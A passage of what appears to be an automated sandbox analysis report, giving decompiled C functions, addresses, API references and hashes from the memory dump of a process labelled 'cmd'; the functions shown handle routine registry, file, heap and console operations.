						 *(_t44 - 0x20) = _t30;
					}
				} else {
					_t21 = RegOpenKeyExW(__ecx, __edx, 0, 1, _t44 - 0x1c);
					if(_t21 == 0) {
						goto L4;
					} else {
						L3:
						_push(_t21);
						L11:
						SetLastError();
					}
				}
				 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
				E00DA572C(_t41);
				return E00D976BD(_t43);
			}

0x00da5662
0x00da5664
0x00da5669
0x00da566e
0x00da5670
0x00da5675
0x00da5677
0x00da567a
0x00da567d
0x00da5680
0x00da5685
0x00da56a2
0x00da56b0
0x00da56b9
0x00da56ce
0x00000000
0x00da56d0
0x00da56d8
0x00da56da
0x00da56df
0x00da570a
0x00000000
0x00da56e1
0x00da56f5
0x00da56f9
0x00da56fd
0x00da5702
0x00da5704
0x00da5707
0x00000000
0x00da5707
0x00da56f9
0x00da56df
0x00da56bb
0x00da56c5
0x00da56c7
0x00da56c7
0x00da568c
0x00da5695
0x00da569d
0x00000000
0x00da569f
0x00da569f
0x00da569f
0x00da570c
0x00da570c
0x00da570c
0x00da569d
0x00da5712
0x00da5719
0x00da5725

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,00DAC100,0000001C,00DA4C85), ref: 00DA5695
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,00DAC100,0000001C,00DA4C85), ref: 00DA56B0
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 00DA56EF
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00DA570C

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: QueryValue$ErrorLastOpen
String ID:
API String ID: 4270309053-0
Opcode ID: da9a34ca2e20f5d3961f2306480902da912b68f5c1d49a7d05bd855559620cd5
Instruction ID: 54b5063464619d7a462c5e65375030b7e859da259ab06c444160e1d469153926
Opcode Fuzzy Hash: da9a34ca2e20f5d3961f2306480902da912b68f5c1d49a7d05bd855559620cd5
Instruction Fuzzy Hash: 6A214CB1D0061AEFDF109FA5AC90AEEFABCFB49750B584125F901F2295D7708D009B74

Uniqueness

Uniqueness Score: -1.00%

Function 00D856AE, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D856AE(void* __ecx, intOrPtr __edx, FILETIME* _a4, intOrPtr _a8) {
				struct _OVERLAPPED _v12;
				short _t11;
				void* _t14;
				void* _t17;
				void* _t27;
				FILETIME* _t30;

				_push(__ecx);
				_push(__ecx);
				_t27 = __ecx;
				_t19 =  *((intOrPtr*)(__edx + 0x20));
				_t11 = 0x1a;
				_v12.InternalHigh = _t11;
				if( *((intOrPtr*)(__edx + 0x20)) == 0) {
					_t19 = __edx;
				}
				_t30 = _a4;
				if(_t30 != 0xffffffff) {
					if(E00DA84D3(_t19) != 0) {
						_t12 = E00D90178(_t12);
						if(_t12 == 0) {
							_t17 =  &(_v12.InternalHigh);
							__imp___get_osfhandle(_t12);
							_t12 = WriteFile(_t17, _t30, _t17, 1,  &_v12);
						}
					}
					if(_t27 != 0 && ( *(_t27 + 0x1c) & 0x00000080) == 0 && E00D90178(_t12) == 0) {
						_t14 =  *0xdad55c; // 0x0
						if(_t14 != 3 && _a8 != 0 && _t14 != 2) {
							__imp___get_osfhandle(_a8);
							SetFileTime(_t14, _t30, 0, 0);
						}
					}
					_t11 = E00D8DB92(_t30);
				}
				 *0xdad56c =  *0xdad56c + 1;
				return _t11;
			}

0x00d856b3
0x00d856b4
0x00d856b9
0x00d856bb
0x00d856be
0x00d856bf
0x00d856c5
0x00d856e1
0x00d856e1
0x00d856c7
0x00d856cd
0x00d99666
0x00d9966a
0x00d99671
0x00d9967a
0x00d9967f
0x00d99687
0x00d99687
0x00d99671
0x00d9968f
0x00d996a2
0x00d996aa
0x00d996bf
0x00d996c7
0x00d996c7
0x00d996aa
0x00d996cf
0x00d996cf
0x00d856d3
0x00d856de

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42d3f82a311908362c6e971014f7dc6d8ea3f8d164d03e75c70eaadfca743142
Instruction ID: e3e0ded3b74a3ca702d2b85e9024f59b9022d8d4620a512c31942c0e1e746771
Opcode Fuzzy Hash: 42d3f82a311908362c6e971014f7dc6d8ea3f8d164d03e75c70eaadfca743142
Instruction Fuzzy Hash: 4D119031600605ABDF157B699C29BBEB769EB85320F28411DF911C71E0EB70AD02DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00DAB91D, Relevance: 6.1, APIs: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00DAB91D(void* __ecx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t30;
				WCHAR* _t31;
				int _t32;
				char _t34;
				void* _t40;
				void* _t42;
				signed int _t43;

				_t18 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t18 ^ _t43;
				_v28 = _v28 & 0x00000000;
				_t34 = 1;
				_v20 = 0x104;
				_t42 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t30 = _v28;
					if(_t30 == 0) {
						_t30 =  &_v548;
					}
					__imp__GetVolumePathNameW(_t42, _t30, _v20);
					if(_t30 == 0) {
						L8:
						_t34 = 0;
					} else {
						_t31 = _v28;
						if(_t31 == 0) {
							_t31 =  &_v548;
						}
						_t32 = GetDriveTypeW(_t31);
						if(_t32 == 0 || _t32 == 4) {
							goto L8;
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E00D96FD0(_t34, _t34, _v8 ^ _t43, _t40, 0x104, _t42, _v28);
			}

0x00dab928
0x00dab92f
0x00dab932
0x00dab949
0x00dab94a
0x00dab94e
0x00dab950
0x00dab953
0x00dab979
0x00dab97b
0x00dab980
0x00dab982
0x00dab982
0x00dab98d
0x00dab995
0x00dab9b4
0x00dab9b4
0x00dab997
0x00dab997
0x00dab99c
0x00dab99e
0x00dab99e
0x00dab9a5
0x00dab9ad
0x00000000
0x00000000
0x00dab9ad
0x00dab995
0x00dab9b9
0x00dab9d2

APIs

memset.MSVCRT ref: 00DAB953

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 00DAB98D
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00DAB9A5
??_V@YAXPAX@Z.MSVCRT ref: 00DAB9B9

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$DriveNamePathTypeVolume
String ID:
API String ID: 1029679093-0
Opcode ID: 3a3428ff7ba96995759ccb348cdd74cbe07651baee34602937aa6a843c155d54
Instruction ID: 499042f1076b309eb5fd5c375ee479bc742b3ad9605ec124a7596ef5b6479a69
Opcode Fuzzy Hash: 3a3428ff7ba96995759ccb348cdd74cbe07651baee34602937aa6a843c155d54
Instruction Fuzzy Hash: 2F112431A04219ABDF10DBA5EC89EBFBBB8EF45354F18046AA605D3241DB34DE45CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA916C, Relevance: 6.1, APIs: 4, Instructions: 66
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00DA916C(void* __ecx, long __edx, DWORD* _a4, WCHAR* _a8, intOrPtr _a12) {
				char _v8;
				void* _t6;
				int _t7;
				void* _t14;
				DWORD* _t15;
				void* _t27;
				void* _t28;
				void* _t30;
				intOrPtr _t31;
				void* _t35;

				_t15 = _a4;
				_t6 =  &_v8;
				_t31 = 0;
				_t28 = __ecx;
				__imp___get_osfhandle(0, _t27, _t30, _t14, __ecx, __ecx);
				_t7 = WriteFile(_t6, __ecx, __edx, _t15, _t6);
				if(_t7 == 0 || _t15 != _v8) {
					L3:
					 *0xdc3cf0 = GetLastError();
					E00D8DB92(_a12);
					if(E00D90178(E00D8DB92(_t28)) == 0) {
						DeleteFileW(_a8);
					} else {
						_t31 = 0x1d;
					}
					 *0xdad5cc =  *0xdad5cc & 0x00000000;
					_t22 =  *0xdc3cf0;
					if( *0xdc3cf0 == 0) {
						_t22 = 0x70;
						 *0xdc3cf0 = _t22;
					}
					if( *0xdad544 == 0) {
						if(_t31 == 0) {
							E00DA985A(_t22);
						}
					} else {
						_t31 = 0;
					}
					_t7 = E00DA85E9(_t31, 1);
					goto L13;
				} else {
					_t35 =  *0xdad544 - _t31; // 0x0
					if(_t35 == 0) {
						L13:
						return _t7;
					}
					goto L3;
				}
			}

0x00da9174
0x00da9177
0x00da917c
0x00da917e
0x00da9185
0x00da918d
0x00da9195
0x00da91a4
0x00da91ad
0x00da91b2
0x00da91c7
0x00da91d1
0x00da91c9
0x00da91cb
0x00da91cb
0x00da91d7
0x00da91de
0x00da91e6
0x00da91ea
0x00da91eb
0x00da91eb
0x00da91f8
0x00da9200
0x00da9202
0x00da9202
0x00da91fa
0x00da91fa
0x00da91fa
0x00da920c
0x00000000
0x00da919c
0x00da919c
0x00da91a2
0x00da9211
0x00da9217
0x00da9217
0x00000000
0x00da91a2

APIs

_get_osfhandle.MSVCRT ref: 00DA9185
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00DA8CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00DA918D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 00DA91A4
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 00DA91D1

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: File$DeleteErrorLastWrite_get_osfhandle
String ID:
API String ID: 2448200120-0
Opcode ID: 87dcb9a0289af9129fd26319d35fded2b814175fb6668eed72c30e2307f20e75
Instruction ID: f7699b4043d494b5e93af86e8c10d785e412a689f172947a3c4130d2ed8a4e77
Opcode Fuzzy Hash: 87dcb9a0289af9129fd26319d35fded2b814175fb6668eed72c30e2307f20e75
Instruction Fuzzy Hash: 8511C131A00317ABDB24AB65ECADF7EF76AEB86711F04401AF805C2290DB709C01DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D8AC30, Relevance: 6.1, APIs: 4, Instructions: 61
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D8AC30(void* __ecx) {
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				intOrPtr* _t18;
				short _t30;
				signed short _t32;
				void* _t38;
				void* _t42;

				if(__ecx != 0) {
					_t16 =  *(__ecx + 0x14);
					if(_t16 != 0) {
						_t16 = _t16 - 1;
						 *(__ecx + 0x14) = _t16;
						_t42 =  *(__ecx + 0x90 + _t16 * 4);
						 *(__ecx + 0x90 + _t16 * 4) =  *(__ecx + 0x90 + _t16 * 4) & 0x00000000;
						if(_t42 != 0) {
							_t41 =  *_t42;
							_t17 =  *( *_t42) & 0x0000ffff;
							if(_t17 >= 0x61) {
								__eflags = _t17 - 0x7a;
								if(__eflags > 0) {
									goto L4;
								}
								_t32 = _t17 + 0xffffffe0 & 0x0000ffff;
								L5:
								_t18 =  *0xdc3cb8;
								if(_t18 == 0) {
									_t18 = 0xdc3ab0;
								}
								if( *_t18 != _t32) {
									E00DA93E2((_t32 & 0x0000ffff) - 0x40, _t38);
									_t41 =  *_t42;
								}
								E00D933FC(_t30, _t41, 1, _t41, _t42, 1);
								RtlFreeHeap(GetProcessHeap(), 0,  *_t42);
								E00D8ACFD( *((intOrPtr*)(_t42 + 4)));
								E00D8ACD5( *((intOrPtr*)(_t42 + 4)));
								 *0xdc3cc9 =  *((intOrPtr*)(_t42 + 8));
								 *0xdc3cc8 =  *((intOrPtr*)(_t42 + 9));
								return RtlFreeHeap(GetProcessHeap(), 0, _t42);
							}
							L4:
							_t32 = _t17;
							goto L5;
						}
					}
				}
				return _t16;
			}

0x00d8ac36
0x00d8ac3c
0x00d8ac41
0x00d8ac47
0x00d8ac48
0x00d8ac4b
0x00d8ac52
0x00d8ac5c
0x00d8ac5e
0x00d8ac60
0x00d8ac66
0x00da1204
0x00da1207
0x00000000
0x00000000
0x00da1210
0x00d8ac6e
0x00d8ac6e
0x00d8ac75
0x00d8acce
0x00d8acce
0x00d8ac7a
0x00da121e
0x00da1223
0x00da1223
0x00d8ac85
0x00d8ac95
0x00d8ac9e
0x00d8aca6
0x00d8acae
0x00d8acb9
0x00000000
0x00d8acc5
0x00d8ac6c
0x00d8ac6c
0x00000000
0x00d8ac6c
0x00d8ac5c
0x00d8ac41
0x00d8accd

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00D8AC8E
RtlFreeHeap.NTDLL(00000000), ref: 00D8AC95
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00D8ACBE
RtlFreeHeap.NTDLL(00000000), ref: 00D8ACC5

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 5d19228149f0267b108dc0b2fb27e1733f262a3cbc6ee1dde11eb6559b1c9670
Instruction ID: be7a30da05862f714d58612bc9cfb9f4d4a615feee3d817d92dcecf71d59a31d
Opcode Fuzzy Hash: 5d19228149f0267b108dc0b2fb27e1733f262a3cbc6ee1dde11eb6559b1c9670
Instruction Fuzzy Hash: 0411B2392007429BEB24BF6D9859B7A7BA1EF85314F28444AE4C7CB391CB20D942C772

Uniqueness

Uniqueness Score: -1.00%

Function 00D95D59, Relevance: 6.1, APIs: 4, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D95D59(void* __ebx) {
				intOrPtr _t4;
				void* _t15;
				intOrPtr* _t16;
				void* _t23;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;

				_t15 = __ebx;
				_t28 =  *0xdc3cb8;
				_t16 = _t28;
				if(_t28 == 0) {
					_t16 = 0xdc3ab0;
				}
				_t23 = _t16 + 2;
				do {
					_t4 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t4 != 0);
				_t27 = (_t16 - _t23 >> 1) + 1;
				if(_t28 == 0) {
					_t28 = 0xdc3ab0;
				}
				E00D936CB(_t15, _t28,  *0xdc3cc0, 0);
				_t29 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
				if(_t29 == 0) {
					L11:
					return 0;
				} else {
					_t20 =  *0xdc3cb8;
					if( *0xdc3cb8 == 0) {
						_t20 = 0xdc3ab0;
					}
					E00D91040(_t29, _t27, _t20);
					if(E00D95DEA(_t29) == 0) {
						RtlFreeHeap(GetProcessHeap(), 0, _t29);
						goto L11;
					} else {
						return 1;
					}
				}
			}

0x00d95d59
0x00d95d5c
0x00d95d62
0x00d95d67
0x00d9f361
0x00d9f361
0x00d95d6d
0x00d95d72
0x00d95d72
0x00d95d75
0x00d95d78
0x00d95d81
0x00d95d86
0x00d95dd8
0x00d95dd8
0x00d95d92
0x00d95daa
0x00d95dae
0x00d95de6
0x00000000
0x00d95db0
0x00d95db0
0x00d95db8
0x00d95ddf
0x00d95ddf
0x00d95dbf
0x00d95dcd
0x00d9f375
0x00000000
0x00d95dd3
0x00000000
0x00d95dd3
0x00d95dcd

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00D95D9D
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D95DA4

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: f93871a5c1172e6de75e6be99850d60223fabd4615409b5d1a45fd4746d25cfd
Instruction ID: d93e50ed5ad3fa21f560ae1d25a646d1fa935e24bdface8fb94e72a5368874da
Opcode Fuzzy Hash: f93871a5c1172e6de75e6be99850d60223fabd4615409b5d1a45fd4746d25cfd
Instruction Fuzzy Hash: CA11E531605F2397CF166B15782DFBE6255EF85B10B1D4168E947DB388CB20DD0687B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D90100, Relevance: 6.1, APIs: 4, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00D90100(void* __ecx, void* __edx) {
				void* _t12;
				long _t15;
				void* _t16;
				void** _t17;
				void* _t19;
				void* _t20;

				_t16 = __ecx;
				_t15 = __edx + 8;
				_t20 = __ecx - 8;
				if(_t15 < __edx) {
					L12:
					_push(0);
					_push(8);
					E00D8C5A2(_t16);
					return 0;
				}
				_t19 = HeapReAlloc(GetProcessHeap(), 0, _t20, _t15);
				if(_t19 == 0) {
					goto L12;
				}
				 *_t19 = _t15;
				HeapSize(GetProcessHeap(), 0, _t19);
				if(_t19 == _t20) {
					L3:
					_t3 = _t19 + 8; // 0x8
					return _t3;
				}
				_t12 =  *0xdc3cdc;
				if(_t12 != _t20) {
					if(_t12 == 0) {
						goto L3;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						_t17 = _t12 + 4;
						_t12 =  *_t17;
						if(_t12 == _t20) {
							break;
						}
						if(_t12 != 0) {
							continue;
						}
						goto L3;
					}
					 *_t17 = _t19;
					goto L3;
				}
				 *0xdc3cdc = _t19;
				_t4 = _t19 + 8; // 0x8
				return _t4;
			}

0x00d90100
0x00d90104
0x00d90107
0x00d9010d
0x00d9c9ea
0x00d9c9ea
0x00d9c9ec
0x00d9c9ee
0x00000000
0x00d9c9f6
0x00d90124
0x00d90128
0x00000000
0x00000000
0x00d90131
0x00d9013a
0x00d90142
0x00d90144
0x00d90144
0x00000000
0x00d90144
0x00d9014b
0x00d90152
0x00d90163
0x00000000
0x00000000
0x00000000
0x00000000
0x00d90165
0x00d90165
0x00d90165
0x00d90168
0x00d9016c
0x00000000
0x00000000
0x00d90170
0x00000000
0x00000000
0x00000000
0x00d90172
0x00d90174
0x00000000
0x00d90174
0x00d90154
0x00d9015a
0x00d90160

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,00D8EBC3), ref: 00D90117
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D9011E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00D90133
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D9013A

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocSize
String ID:
API String ID: 2549470565-0
Opcode ID: 9d591af30aee8eb6d95fbd4ba43f36bcdb1e3cc13bcda1b6dd888fea0c591123
Instruction ID: 0a663320064b39f7691aa1b6f52b69091448fcdb29480aa5af59824c0faf704a
Opcode Fuzzy Hash: 9d591af30aee8eb6d95fbd4ba43f36bcdb1e3cc13bcda1b6dd888fea0c591123
Instruction Fuzzy Hash: 42019276200703AFCB119B55FC8DE9ABB69FB94762F284060E50AD7260DB31D9448B70

Uniqueness

Uniqueness Score: -1.00%

Function 00DA7DF1, Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00DA7DF1(unsigned int __ecx, void* __esi) {
				signed int _v8;
				signed short _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				struct _COORD _v36;
				long _v40;
				void* __ebx;
				signed int _t11;
				void* _t20;
				int _t28;
				void* _t34;
				void* _t35;
				void* _t37;
				signed int _t38;

				_t36 = __esi;
				_t11 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t11 ^ _t38;
				_t28 = __ecx;
				if(((__ecx >> 0x00000004 ^ __ecx) & 0x0000000f) != 0) {
					_push(__esi);
					_t37 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t37,  &_v32) == 0) {
						_t20 = 1;
					} else {
						_v36 = 0;
						FillConsoleOutputAttribute(_t37, _t28, _v32.dwSize * _v30, _v36,  &_v40);
						SetConsoleTextAttribute(_t37, _t28);
						_t20 = 0;
					}
					_pop(_t36);
				} else {
					_t20 = 1;
				}
				return E00D96FD0(_t20, _t28, _v8 ^ _t38, _t34, _t35, _t36);
			}

0x00da7df1
0x00da7df9
0x00da7e00
0x00da7e04
0x00da7e0f
0x00da7e16
0x00da7e1f
0x00da7e2e
0x00da7e5e
0x00da7e30
0x00da7e36
0x00da7e4a
0x00da7e52
0x00da7e58
0x00da7e58
0x00da7e5f
0x00da7e11
0x00da7e13
0x00da7e13
0x00da7e6e

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00D9E18E), ref: 00DA7E19
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00D9E18E), ref: 00DA7E26
FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00D9E18E), ref: 00DA7E4A
SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,00D9E18E), ref: 00DA7E52

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
String ID:
API String ID: 1033415088-0
Opcode ID: b8240a7531935c9422fe5cbc3a0ec20ff6e9aa6a5f21ea6123b0b8e3388e7cd8
Instruction ID: b014b717367f1d1ddf9292c1ea66b47bea9802849ac7fead88ef89d2ea5bec42
Opcode Fuzzy Hash: b8240a7531935c9422fe5cbc3a0ec20ff6e9aa6a5f21ea6123b0b8e3388e7cd8
Instruction Fuzzy Hash: 60015E72A1421AAF9B00ABB49C99DFFB7FCEF0E351B040165F916D6240EA249E01D7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00D96D00, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D96D00() {
				signed int _t10;
				intOrPtr* _t13;
				intOrPtr* _t14;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t25;

				_t25 =  *0xd80000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0xd8003c; // 0xf8
					__eflags =  *((intOrPtr*)(_t19 + 0xd80000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0xd80000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0xd80018; // 0xc0e010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0xd80074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0xd80074)) > 0xe) {
								__eflags =  *(_t19 + 0xd800e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0xd80084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0xd80084)) > 0xe) {
									__eflags =  *(_t19 + 0xd800f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0xdad1b0 = _t10;
				__set_app_type(E00D9738E(1));
				 *0xdad518 =  *0xdad518 | 0xffffffff;
				 *0xdad51c =  *0xdad51c | 0xffffffff;
				_t13 = __p__fmode();
				_t22 =  *0xdad4e0; // 0x0
				 *_t13 = _t22;
				_t14 = __p__commode();
				_t23 =  *0xdad4d4; // 0x0
				 *_t14 = _t23;
				_t15 = E00D975B0();
				if( *0xdad0b0 == 0) {
					__setusermatherr(E00D975B0);
				}
				E00D975B3(_t15);
				return 0;
			}

0x00d96d05
0x00d96d0c
0x00d96d12
0x00d96d18
0x00d96d22
0x00000000
0x00d96d24
0x00d96d24
0x00d96d24
0x00d96d2b
0x00d96d30
0x00d96d4c
0x00d96d4e
0x00d96d55
0x00d96d57
0x00000000
0x00d96d57
0x00d96d32
0x00d96d32
0x00d96d37
0x00000000
0x00d96d39
0x00d96d39
0x00d96d3b
0x00d96d42
0x00d96d44
0x00d96d5d
0x00d96d5d
0x00d96d5d
0x00d96d5d
0x00d96d5d
0x00d96d42
0x00d96d37
0x00d96d30
0x00d96d0e
0x00d96d0e
0x00d96d0e
0x00d96d0e
0x00d96d62
0x00d96d6d
0x00d96d73
0x00d96d7a
0x00d96d83
0x00d96d89
0x00d96d8f
0x00d96d91
0x00d96d97
0x00d96d9d
0x00d96d9f
0x00d96dab
0x00d96db2
0x00d96db8
0x00d96db9
0x00d96dc0

APIs

__set_app_type.MSVCRT ref: 00D96D6D
__p__fmode.MSVCRT ref: 00D96D83
__p__commode.MSVCRT ref: 00D96D91
__setusermatherr.MSVCRT ref: 00D96DB2

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1063105408-0
Opcode ID: 1508b6fe888c796633e44d1f64090833a47e9875f70900cec470b0cab945a6d2
Instruction ID: 2d33bbc11604b81b0e614882f25ddcb5b80eb6655f794ed20ee3ea4131b724a2
Opcode Fuzzy Hash: 1508b6fe888c796633e44d1f64090833a47e9875f70900cec470b0cab945a6d2
Instruction Fuzzy Hash: 86115270A14301CFCBA49B30E84C6243B61FB06315F24496AE566CA3E1DB77C985DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D843A0, Relevance: 6.0, APIs: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00D843A0(void* __ecx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES _v16;
				void* _t6;
				long _t7;
				void* _t10;
				void* _t15;
				void* _t17;

				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_v16.nLength = 0xc;
				_t6 = CreateFileW(E00D922C0(_t10, __ecx), 0x40000000, 0,  &_v16, 4, 0x8000080, 0);
				_t15 = _t6;
				if(_t15 == 0xffffffff) {
					_t7 = GetLastError();
					 *0xdc3cf0 = _t7;
					if(_t7 == 0x6e) {
						 *0xdc3cf0 = 2;
					}
					_t17 = 0xffffffff;
